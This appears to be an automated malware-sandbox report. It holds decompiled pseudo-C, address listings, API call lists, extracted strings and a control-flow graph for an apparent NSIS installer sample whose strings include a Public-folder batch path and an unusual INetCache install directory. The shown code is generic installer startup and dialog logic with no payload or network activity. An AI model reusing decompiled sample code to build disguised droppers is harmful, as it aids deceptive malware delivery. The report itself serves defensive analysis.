				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x42a2d8 = _t56;
				SHGetFileInfoW(0x4216a8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E0040624C(0x429200, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Public\\u5p3.bat\" ";
				E0040624C(_t193, _t60);
				 *0x42a200 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Public\\u5p3.bat\" " == 0x22) {
					_t63 =  &M00435002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B4A(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E0040330C(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403880();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x42a2b4 - _t151;
								if( *0x42a2b4 == _t151) {
									L72:
									_t72 =  *0x42a2cc;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406626(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058AE( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a220 == _t151) {
							L47:
							 *0x42a2cc =  *0x42a2cc | 0xffffffff;
							 *(_t197 + 0x14) = E0040395A( *0x42a2cc);
							goto L48;
						}
						_t184 = E00405B4A(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E00405819(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Public";
								if(lstrcmpiW(_t172, L"C:\\Users\\Public") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E004057FC();
									} else {
										E0040577F();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth" - _t151; // 0x43
									if(_t243 == 0) {
										E0040624C(L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t195);
									}
									E0040624C(0x42b000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x120)));
										DeleteFileW(0x420ea8);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(0x438800, 0x420ea8, 1) != 0) {
											E00406012(_t156, 0x420ea8, _t151);
											E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x124)));
											_t103 = E00405831(0x420ea8);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406012(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C25(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E0040624C(L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							E0040624C(L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E0040330C(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E0040330C(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x42a2c0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040624C(L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B4A(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065B6(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E00406626(0xa);
					 *0x42a204 = E00406626(8);
					_t56 = E00406626(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a20f =  *0x42a20f | 0x00000040;
						}
					}
					goto L8;
				}
			}








































                                                        0x00403348
                                                        0x00403349
                                                        0x00403350
                                                        0x00403354
                                                        0x0040335c
                                                        0x00403360
                                                        0x0040336c
                                                        0x00403375
                                                        0x0040337a
                                                        0x0040337d
                                                        0x00403384
                                                        0x0040338b
                                                        0x0040338b
                                                        0x00403384
                                                        0x0040338d
                                                        0x0040338d
                                                        0x004033d5
                                                        0x004033d6
                                                        0x004033dd
                                                        0x004033e3
                                                        0x004033f9
                                                        0x00403409
                                                        0x0040340e
                                                        0x00403414
                                                        0x0040341b
                                                        0x0040342f
                                                        0x00403434
                                                        0x00403436
                                                        0x0040343a
                                                        0x0040343f
                                                        0x0040343f
                                                        0x0040344e
                                                        0x00403450
                                                        0x00403454
                                                        0x0040345a
                                                        0x00403571
                                                        0x00403577
                                                        0x00403582
                                                        0x00403584
                                                        0x00403589
                                                        0x0040358b
                                                        0x004035e3
                                                        0x004035e8
                                                        0x004035f2
                                                        0x004035f9
                                                        0x004035fd
                                                        0x004036ae
                                                        0x004036ae
                                                        0x004036b3
                                                        0x004036b9
                                                        0x004036be
                                                        0x004037e4
                                                        0x004037ea
                                                        0x00403868
                                                        0x00403868
                                                        0x0040386d
                                                        0x00403870
                                                        0x00403872
                                                        0x00403872
                                                        0x0040387a
                                                        0x0040387a
                                                        0x004037fa
                                                        0x00403800
                                                        0x00403802
                                                        0x0040380f
                                                        0x00403822
                                                        0x0040382a
                                                        0x00403832
                                                        0x00403832
                                                        0x0040383a
                                                        0x0040383f
                                                        0x00403846
                                                        0x00403854
                                                        0x00403857
                                                        0x0040385d
                                                        0x0040385f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403848
                                                        0x0040384e
                                                        0x00403850
                                                        0x00403852
                                                        0x00403861
                                                        0x00403863
                                                        0x00000000
                                                        0x00403863
                                                        0x00000000
                                                        0x00403852
                                                        0x00403846
                                                        0x004036cd
                                                        0x004036d4
                                                        0x004036d4
                                                        0x00403609
                                                        0x0040369e
                                                        0x0040369e
                                                        0x004036aa
                                                        0x00000000
                                                        0x004036aa
                                                        0x00403616
                                                        0x0040361a
                                                        0x00403668
                                                        0x00403668
                                                        0x0040366a
                                                        0x00403672
                                                        0x004036e5
                                                        0x004036e7
                                                        0x004036ee
                                                        0x004036f6
                                                        0x004036f6
                                                        0x00403701
                                                        0x00403706
                                                        0x00403715
                                                        0x00403719
                                                        0x0040371a
                                                        0x00403723
                                                        0x0040371c
                                                        0x0040371c
                                                        0x0040371c
                                                        0x00403729
                                                        0x0040372f
                                                        0x00403736
                                                        0x0040373e
                                                        0x0040373e
                                                        0x0040374c
                                                        0x00403758
                                                        0x00403766
                                                        0x0040376b
                                                        0x00403771
                                                        0x0040377d
                                                        0x00403783
                                                        0x0040378d
                                                        0x004037a3
                                                        0x004037b4
                                                        0x004037ba
                                                        0x004037c1
                                                        0x004037c4
                                                        0x004037ca
                                                        0x004037ca
                                                        0x004037c1
                                                        0x004037ce
                                                        0x004037d5
                                                        0x004037d5
                                                        0x004037da
                                                        0x004037da
                                                        0x00000000
                                                        0x00403715
                                                        0x00403674
                                                        0x00403677
                                                        0x00403682
                                                        0x00000000
                                                        0x00000000
                                                        0x0040368a
                                                        0x00403695
                                                        0x0040369a
                                                        0x00000000
                                                        0x0040369a
                                                        0x00403623
                                                        0x0040363b
                                                        0x0040364c
                                                        0x0040364d
                                                        0x00403651
                                                        0x00403653
                                                        0x00403661
                                                        0x00403664
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403664
                                                        0x00403666
                                                        0x00000000
                                                        0x00403666
                                                        0x00403593
                                                        0x0040359f
                                                        0x004035a4
                                                        0x004035a9
                                                        0x004035ab
                                                        0x00000000
                                                        0x00000000
                                                        0x004035b3
                                                        0x004035bb
                                                        0x004035cc
                                                        0x004035d4
                                                        0x004035d6
                                                        0x004035db
                                                        0x004035dd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403460
                                                        0x00403460
                                                        0x00403462
                                                        0x00403466
                                                        0x0040346f
                                                        0x00403473
                                                        0x00403478
                                                        0x00403479
                                                        0x00403479
                                                        0x0040347e
                                                        0x00000000
                                                        0x00403484
                                                        0x00403485
                                                        0x0040348a
                                                        0x0040348c
                                                        0x00403494
                                                        0x0040349b
                                                        0x0040349b
                                                        0x00403494
                                                        0x004034ac
                                                        0x004034bf
                                                        0x004034c0
                                                        0x004034d5
                                                        0x004034da
                                                        0x004034de
                                                        0x004034e7
                                                        0x004034ef
                                                        0x004034f6
                                                        0x004034f6
                                                        0x004034ef
                                                        0x00403502
                                                        0x00403515
                                                        0x00403516
                                                        0x0040352b
                                                        0x00403531
                                                        0x00403535
                                                        0x00000000
                                                        0x0040355c
                                                        0x0040355c
                                                        0x00403561
                                                        0x0040356a
                                                        0x0040356f
                                                        0x0040356f
                                                        0x00000000
                                                        0x0040356f
                                                        0x00403535
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403468
                                                        0x00403468
                                                        0x00403469
                                                        0x0040346a
                                                        0x00000000
                                                        0x0040353d
                                                        0x00403544
                                                        0x0040354a
                                                        0x0040354d
                                                        0x0040354d
                                                        0x0040354e
                                                        0x00403551
                                                        0x00000000
                                                        0x0040355a
                                                        0x00403392
                                                        0x00403393
                                                        0x0040339f
                                                        0x004033a6
                                                        0x00000000
                                                        0x004033a8
                                                        0x004033aa
                                                        0x004033b8
                                                        0x004033bd
                                                        0x004033c4
                                                        0x004033c8
                                                        0x004033cc
                                                        0x004033ce
                                                        0x004033ce
                                                        0x004033cc
                                                        0x00000000
                                                        0x004033c4

                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403360
                                                        • GetVersion.KERNEL32 ref: 00403366
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                        • OleInitialize.OLE32(00000000), ref: 004033DD
                                                        • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                        • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\Public\u5p3.bat" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                        • CharNextW.USER32(00000000,"C:\Users\Public\u5p3.bat" ,00000020,?,00000006,00000008,0000000A), ref: 00403448
                                                          • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                          • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040359F
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035BB
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                        • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                          • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                        • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                        • ExitProcess.KERNEL32 ref: 004036D4
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036E7
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 004036F6
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403701
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\u5p3.bat" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                        • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                        • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                                        • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                                        • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                        • ExitProcess.KERNEL32 ref: 0040387A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                        • String ID: "C:\Users\Public\u5p3.bat" $.tmp$1033$C:\Users\Public$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 2488574733-246158635
                                                        • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                        • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                        • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                        • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 163 4054f5-4054f8 140->163 164 4054d9-4054f3 SendMessageW * 2 140->164 143 4055a2-4055c4 GetDlgItem CreateThread FindCloseChangeNotification 141->143 144 4055ca-4055d7 141->144 143->144 146 4055f5-4055ff 144->146 147 4055d9-4055df 144->147 148 405601-405607 146->148 149 405655-405659 146->149 151 4055e1-4055f0 ShowWindow * 2 call 404216 147->151 152 40561a-405623 call 404248 147->152 153 405609-405615 call 4041ba 148->153 154 40562f-40563f ShowWindow 148->154 149->152 157 40565b-405661 149->157 151->146 160 405628-40562c 152->160 153->152 161 405641-40564a call 4052b0 154->161 162 40564f-405650 call 4041ba 154->162 157->152 165 405663-405676 SendMessageW 157->165 161->162 162->149 168 405508-40551f call 4041e1 163->168 169 4054fa-405506 SendMessageW 163->169 164->163 170 405778-40577a 165->170 171 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 165->171 178 405521-405535 ShowWindow 168->178 179 405555-405576 GetDlgItem SendMessageW 168->179 169->168 170->160 176 4056a9-4056b9 GetWindowRect 171->176 177 4056bc-4056d1 TrackPopupMenu 171->177 176->177 177->170 180 4056d7-4056ee 177->180 181 405544 178->181 182 405537-405542 ShowWindow 178->182 179->170 183 40557c-405594 SendMessageW * 2 179->183 184 4056f3-40570e SendMessageW 180->184 185 40554a-405550 call 404216 181->185 182->185 183->170 184->184 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                        C-Code - Quality: 95%
                                                        			E004053EF(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x4291e4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405383, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040626E(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x4236e8;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291cc == _t156) {
							ShowWindow( *0x42a208, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226c0; // 0x72fd3c
								E004052B0( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004041BA(_t171);
							goto L25;
						}
						 *0x421eb8 = 2;
						E004041BA(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404248(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291d0, _t156);
						ShowWindow(_t169, 8);
						E00404216(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a214;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291d0 = GetDlgItem(_a4, 0x403);
				 *0x4291c8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x4291e4 = _t134;
				_v8 = _t134;
				E00404216( *0x4291d0);
				 *0x4291d4 = E00404B4D(4);
				 *0x4291ec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041E1(_a4);
				if(( *0x42a21c & 0x00000003) != 0) {
					ShowWindow( *0x4291d0, _t156);
					if(( *0x42a21c & 0x00000002) != 0) {
						 *0x4291d0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404216( *0x4291c8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a21c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                        0x004053f7
                                                        0x004053fd
                                                        0x00405407
                                                        0x0040540a
                                                        0x004055a0
                                                        0x004055bd
                                                        0x004055c4
                                                        0x004055c4
                                                        0x004055d7
                                                        0x004055f5
                                                        0x004055f7
                                                        0x004055ff
                                                        0x00405655
                                                        0x00405659
                                                        0x00000000
                                                        0x00000000
                                                        0x0040565b
                                                        0x00405661
                                                        0x00000000
                                                        0x00000000
                                                        0x0040566b
                                                        0x00405673
                                                        0x00405676
                                                        0x00405778
                                                        0x00000000
                                                        0x00405778
                                                        0x00405685
                                                        0x00405690
                                                        0x00405699
                                                        0x004056a4
                                                        0x004056a7
                                                        0x004056b0
                                                        0x004056b6
                                                        0x004056b9
                                                        0x004056b9
                                                        0x004056d1
                                                        0x004056da
                                                        0x004056dd
                                                        0x004056e4
                                                        0x004056eb
                                                        0x004056f3
                                                        0x004056f3
                                                        0x0040570a
                                                        0x0040570a
                                                        0x00405711
                                                        0x00405717
                                                        0x00405723
                                                        0x0040572a
                                                        0x00405733
                                                        0x00405735
                                                        0x00405738
                                                        0x00405747
                                                        0x0040574a
                                                        0x00405750
                                                        0x00405751
                                                        0x00405757
                                                        0x00405758
                                                        0x00405759
                                                        0x00405761
                                                        0x0040576c
                                                        0x00405772
                                                        0x00405772
                                                        0x00000000
                                                        0x004056d1
                                                        0x00405607
                                                        0x00405637
                                                        0x0040563f
                                                        0x00405641
                                                        0x0040564a
                                                        0x0040564a
                                                        0x00405650
                                                        0x00000000
                                                        0x00405650
                                                        0x0040560b
                                                        0x00405615
                                                        0x00000000
                                                        0x004055d9
                                                        0x004055df
                                                        0x0040561a
                                                        0x00000000
                                                        0x00405623
                                                        0x004055e8
                                                        0x004055ed
                                                        0x004055f0
                                                        0x00000000
                                                        0x004055f0
                                                        0x004055d7
                                                        0x00405410
